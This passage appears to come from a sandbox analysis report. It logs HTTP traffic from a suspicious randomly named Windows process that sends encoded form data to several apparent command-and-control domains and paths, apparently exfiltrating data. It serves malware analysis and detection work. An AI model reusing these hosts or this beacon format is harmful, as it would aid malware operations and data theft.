                                                                Jan 11, 2025 05:10:50.469890118 CET | 459 | OUT | GET /4iun/?-Jkp4f=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywppdeeEuZCatrMvKH/wfqUumWqZ/cxrFwfzjD9bIbXwkyXSm2rk8ZQ8OQa&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:51.383589983 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:51 GMT
                                                                server: LiteSpeed
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                9 | 192.168.2.7 | 49985 | 154.23.184.95 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:56.560883999 CET | 696 | OUT | POST /lazq/ HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.hm35s.top
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.hm35s.top/lazq/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:57.435960054 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:10:57 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                10 | 192.168.2.7 | 49986 | 154.23.184.95 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:59.117089033 CET | 716 | OUT | POST /lazq/ HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.hm35s.top
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.hm35s.top/lazq/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHZS3j13Ka4OWgk9uLKYQPhxCFFVD7+LfdAmwr/pxyq8YazLObUX74oiZIjhaIbpFNmMC/tkRJcH4IxfVUtZ72prpnHgCNO5u21mRFSqFqYlWDSp8vcKsdzrSHQCJFfslxpJEFc4GvZyQjWGyxmiAzuiA1V/etzSwlWoiISnfANnKriQPT3K4HAqvcbl3iTQ=
                                                                Jan 11, 2025 05:11:00.002583027 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:10:59 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                11 | 192.168.2.7 | 49987 | 154.23.184.95 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:01.661170006 CET | 1729 | OUT | POST /lazq/ HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.hm35s.top
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.hm35s.top/lazq/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f= [TRUNCATED]
                                                                Jan 11, 2025 05:11:02.537204981 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:11:02 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                12 | 192.168.2.7 | 49988 | 154.23.184.95 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:04.203279972 CET | 446 | OUT | GET /lazq/?-Jkp4f=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkSSnofUD+98uCWUF0f78bF04x35xFQJCgARn3b4pm0JSfuygzEuRCwX70&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.hm35s.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:05.088551998 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 04:11:04 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a5f968-94"
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                13 | 192.168.2.7 | 49989 | 88.198.8.150 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:10.168541908 CET | 723 | OUT | POST /2lci/ HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.snehasfashion.shop
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.snehasfashion.shop/2lci/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=oUpW0YhmY+UamE+XpdzGa234gYzZLfgDOoKHeVwLo6elcPfwSBpfSpfUsTYrrVLNid3v/gaIpMVHB/3KmGloFy+DX8+q+t55VXs8NgWNVsZHxESL5rLzScuAf+Q+LxjlN+PeyPhv/pGkKhqy3weIJan73WsCjg2hG+QGSF8RNlYnKXXmwdesocqh438J2gXIgLmxmG1ujHDZwhGDFA==
                                                                Jan 11, 2025 05:11:10.843677044 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 1992
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 04:11:10 GMT
                                                                Jan 11, 2025 05:11:10.843704939 CET | 1005 | IN


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                14 | 192.168.2.7 | 49990 | 88.198.8.150 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:12.707468987 CET | 743 | OUT | POST /2lci/ HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.snehasfashion.shop
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.snehasfashion.shop/2lci/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoJqlFuvwTFdfRpfU0jYyz1LSidyF/iOIpMBHB9vKmV9rEi+FOs+o6t55VXs8NgC3VsBHx0CLo6LyOMuDJuQ+BRiNN+PwyOtF/q+kKi+y5CmLSKnxqGsJtTTuDf4IXkM3IkUhGBWEq/SA2NSa81Y/hGK9iKiprkBP8wmz9znHT3lK8xJHj+zdlcPVyPEQ/G8=
                                                                Jan 11, 2025 05:11:13.427510977 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 1992
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 04:11:13 GMT
                                                                Jan 11, 2025 05:11:13.427566051 CET | 224 | IN
                                                                Jan 11, 2025 05:11:13.427603006 CET | 781 | IN


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                15 | 192.168.2.7 | 49991 | 88.198.8.150 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:15.309036970 CET | 1756 | OUT | POST /2lci/ HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.snehasfashion.shop
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.snehasfashion.shop/2lci/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f= [TRUNCATED]
                                                                Jan 11, 2025 05:11:16.124332905 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 1992
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 04:11:16 GMT
                                                                Jan 11, 2025 05:11:16.124356031 CET | 1005 | IN


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                16 | 192.168.2.7 | 49992 | 88.198.8.150 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:17.843693972 CET | 455 | OUT | GET /2lci/?SVjx=u6ApldVh4TiTWl&-Jkp4f=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDKFSbRcaZ2/tMcmtbbzmofvFf8wLCxrzsSN20Y6kXBwn9DafM4OtR1q/N HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:18.533229113 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 6603
                                                                date: Sat, 11 Jan 2025 04:11:18 GMT
                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opa [TRUNCATED]
                                                                Jan 11, 2025 05:11:18.533282995 CET1236INData Raw: 2d 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 37 66 61 66 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 37 2c 32 35 30 2c 32 35 32 2c 76 61 72 28 2d 2d 62 67
                                                                Data Ascii: --bg-opacity:1;background-color:#f7fafc;background-color:rgba(247,250,252,var(--bg-opacity))}.border-gray-200{--border-opacity:1;border-color:#edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;bord
                                                                Jan 11, 2025 05:11:18.533299923 CET448INData Raw: 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 2e 72 65 6c 61 74 69 76 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 74 6f 70 2d 30 7b 74 6f 70 3a 30 7d 2e 72 69 67 68 74 2d 30 7b 72 69 67 68 74 3a 30 7d 2e 73 68 61 64 6f 77 7b 62
                                                                Data Ascii: position:fixed}.relative{position:relative}.top-0{top:0}.right-0{right:0}.shadow{box-shadow:0 1px 3px 0 rgba(0,0,0,.1),0 1px 2px 0 rgba(0,0,0,.06)}.text-center{text-align:center}.text-gray-200{--text-opacity:1;color:#edf2f7;color:rgba(237,242,
                                                                Jan 11, 2025 05:11:18.533313990 CET1236INData Raw: 2e 74 65 78 74 2d 67 72 61 79 2d 35 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 61 30 61 65 63 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 36 30 2c 31 37 34 2c 31 39 32 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70
                                                                Data Ascii: .text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#718096;color:rgba(113,128,150,var(--text-opacity))}.text-gray-700{--text-opacity:1;color:#4a5568;color:rgba(74,85,
                                                                Jan 11, 2025 05:11:18.533329010 CET1236INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e
                                                                Data Ascii: bic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-webkit-animation-timing-function:cu
                                                                Jan 11, 2025 05:11:18.533341885 CET448INData Raw: 6b 5c 3a 62 67 2d 67 72 61 79 2d 39 30 30 7b 2d 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 32 30 32 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 36 2c 33 32
                                                                Data Ascii: k\:bg-gray-900{--bg-opacity:1;background-color:#1a202c;background-color:rgba(26,32,44,var(--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text
                                                                Jan 11, 2025 05:11:18.533360004 CET967INData Raw: 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20
                                                                Data Ascii: body { font-family: ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color E


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                17  192.168.2.7  49993  104.21.15.100  80  360  C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                Jan 11, 2025 05:11:23.590764046 CET  717  OUT  POST /s7xt/ HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.sitioseguro.blog
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.sitioseguro.blog/s7xt/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=HKwmnw8C74mvA+p9z1iCY1V1UgdybW9maJmexcRt5A2bu5bvDTjBuP0o5j00DljqSmWNux5dAeu4nWPLuH7RyVJJkKCl5rNLyStxlsDILiDX/7i4oo+b1YR8zsOoJWnm5XGVqji2xGGhy5vUi1JX9u6tfAT3rU4VOMPGEas0RG6MuoE+r3yphIrsov9LY2jPcYgtPLGNssETmcLImg==
                                                                Jan 11, 2025 05:11:24.152702093 CET  951  IN  HTTP/1.1 405 Not Allowed
                                                                Date: Sat, 11 Jan 2025 04:11:24 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U22gtAMNhx8Q0cpKwgu%2Be7xs5zOhzAeEU5hTBK7AmBxfbzGoc8PpEgPm1mhQ42ZO2JsD63KvzNgDkF1RuBRGCSg4pmo%2F48b1%2Fe0LLBw0MnTQmKAZnkfwRasHsXp%2BEvKwouL1lmsdeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 900210030878430a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2073&min_rtt=2073&rtt_var=1036&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                18  192.168.2.7  49994  104.21.15.100  80  360  C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                Jan 11, 2025 05:11:26.146740913 CET  737  OUT  POST /s7xt/ HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.sitioseguro.blog
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.sitioseguro.blog/s7xt/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5ySbuYrvCRHBvP0ohT18e1jjSmavuwFdAeK4nTLLuUTQ0FJH86Cn3LNLyStxlsXyLi7X/Oy4yJ+cpoR/0sOoDGnq5XGzqmCcxEOhy4fUikJUzu6rcwSOrBIfAZvZMJUoXn2Lm+FcxV+F/ZTXstZ9PQ+6eZk1Cpyszbh5rOqMwRZoofc4cVfDh7J53hn0s9Q=


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                19  192.168.2.7  49995  104.21.15.100  80  360  C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                Jan 11, 2025 05:11:28.692279100 CET  1750  OUT  POST /s7xt/ HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.sitioseguro.blog
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.sitioseguro.blog/s7xt/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f= [TRUNCATED]
                                                                Jan 11, 2025 05:11:29.288331985 CET  951  IN  HTTP/1.1 405 Not Allowed
                                                                Date: Sat, 11 Jan 2025 04:11:29 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fmHn8zqOxDsjP7lI1ETaxekvrlRVKbK%2FkzkRQTbklP0yCzkurM2gDcr%2FTUeK%2Bt%2BD856LKCdrMyF6Lyl6XFbK3Akiaveb7zB4XKx71cxTW6X0YMDvjuteyrBSl8h3k1D4cKrK2bvFjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90021022e9f80f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1750&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                20  192.168.2.7  49996  104.21.15.100  80  360  C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                Jan 11, 2025 05:11:31.234817028 CET  453  OUT  GET /s7xt/?-Jkp4f=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA6U5k7peC8KRmsRBR08PWB1at1OCwwLT81ahb8amXGnyuxVS1phW32kmk&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:31.784411907 CET  857  IN  HTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 04:11:31 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                Accept-Ranges: bytes
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FWnW6es3%2FSLwt3yN2hJFMGfDCbULgH%2FfX%2BooAB%2FfZ%2Fw%2FQrNtzCoTUgtRpsNf%2Fvp2qiHvPJZo1tjM0AHDsEqIA%2FEW6JNHmjOuZPLwTxIRacF%2BNIo3R2%2BFc7aw%2BORKoWocFGOlgYwrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90021032ce114401-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=453&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                21  192.168.2.7  49997  46.253.5.221  80  360  C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                Jan 11, 2025 05:11:36.849097967 CET  708  OUT  POST /gybb/ HTTP/1.1
